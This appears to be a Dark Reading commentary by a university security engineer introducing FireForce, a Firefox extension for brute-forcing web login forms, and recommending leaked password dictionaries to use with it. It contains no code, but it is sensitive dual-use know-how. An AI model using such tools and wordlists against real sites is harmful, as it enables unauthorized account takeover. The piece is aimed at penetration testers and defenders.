informa
Commentary

That Was Easy: New Tool For Web Form Password Brute Force Attacks

Passwords suck. We all know it, but unless you can afford to provide multifactor authentication to all of your users and business partners, you're stuck with them.
Passwords suck. We all know it, but unless you can afford to provide multifactor authentication to all of your users and business partners, you're stuck with them.Implementing technical controls to enforce strong password creation by your users is a necessity because users will pick weak passwords when given the opportunity. Sure, there are some exceptions to the rule, but those aren't the ones we're worried about as security professionals. We are worried about the ones that are easy to crack.

Back in March, Ron Bowes posted a great blog titled "Hard evidence that people suck at passwords." Ron takes a look at passwords that have been leaked by attackers who've breached sites like phpbb, Faithwriters, and Elite Hackers. He provides some interesting insight into password choices made by users.

Also, it's worth noting that Ron is currently hosting password dictionaries that come from various sources, like password cracking tools and leaked password lists from compromised websites. They are very useful with the tool I'm about to talk about.

In a discussion about password brute forcing on the Metasploit Framework mailing list, someone pointed out a Firefox extension that enables brute force password attacks against Web forms from right within the browser. It's FireForce, and it is available here.

What a simplistic but useful and powerful tool! Typically, we refrain from password attacks because of account lockout issues, but sometimes we encounter Web apps with a local user authentication source that has no lockout feature. FireForce is simple in its implementation, but powerful enough to allow for brute forcing of just passwords or both user names and passwords.

Teamed with the passwords hosted at SkullSecurity, FireForce is nearly unstoppable, but it's not a replacement for Medusa. Be sure to read the documentation for info about running separate Firefox instances and configuring the user name and password brute forcing properly -- the dictionary selection is a little backward.

Addendum: Here is the link that was sent to the Metasploit Express users mailing list. Thanks, Jason.

John H. Sawyer is a senior security engineer on the IT Security Team at the University of Florida. The views and opinions expressed in this blog are his own and do not represent the views and opinions of the UF IT Security Team or the University of Florida. When John's not fighting flaming, malware-infested machines or performing autopsies on blitzed boxes, he can usually be found hanging with his family, bouncing a baby on one knee and balancing a laptop on the other. Special to Dark Reading.

Recommended Reading: